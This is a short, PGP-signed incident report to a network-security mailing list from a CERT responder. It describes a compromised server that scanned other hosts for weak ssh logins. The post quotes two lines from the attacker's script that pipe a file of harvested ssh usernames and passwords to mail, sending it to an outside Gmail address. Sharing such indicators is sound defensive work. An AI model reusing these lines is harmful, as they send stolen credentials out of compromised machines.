[nsp-sec] gmail account recieves compromised ssh accounts
Torsten Voss
voss at dfn-cert.de
Tue Nov 22 10:53:39 EST 2011
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello,
we've found a compromised server which was attacking other systems with ssh
account probes. The script sends the ssh user+passwords to:
facut.la.vrajeala at gmail.com
Script-lines:
cat vuln.txt | mail -s "L-amPrins" facut.la.vrajeala at gmail.com
cat vuln.txt | mail -s 'We Got Roots' facut.la.vrajeala at gmail.com
Kind regards,
Torsten, AS680
- --
Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49 40 808077-590
Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.: DE 232129737
Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
Automatische Warnmeldungen https://www.cert.dfn.de/autowarn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.16 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/
iEYEARECAAYFAk7LxYIACgkQLn8qYyAllOS+1QCcCRAfRQjZm+Dmt3wZqQpFw0sA
8eIAnApNm8Ib5aGofxdNgkOaUmfbZSrY
=1CSX
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list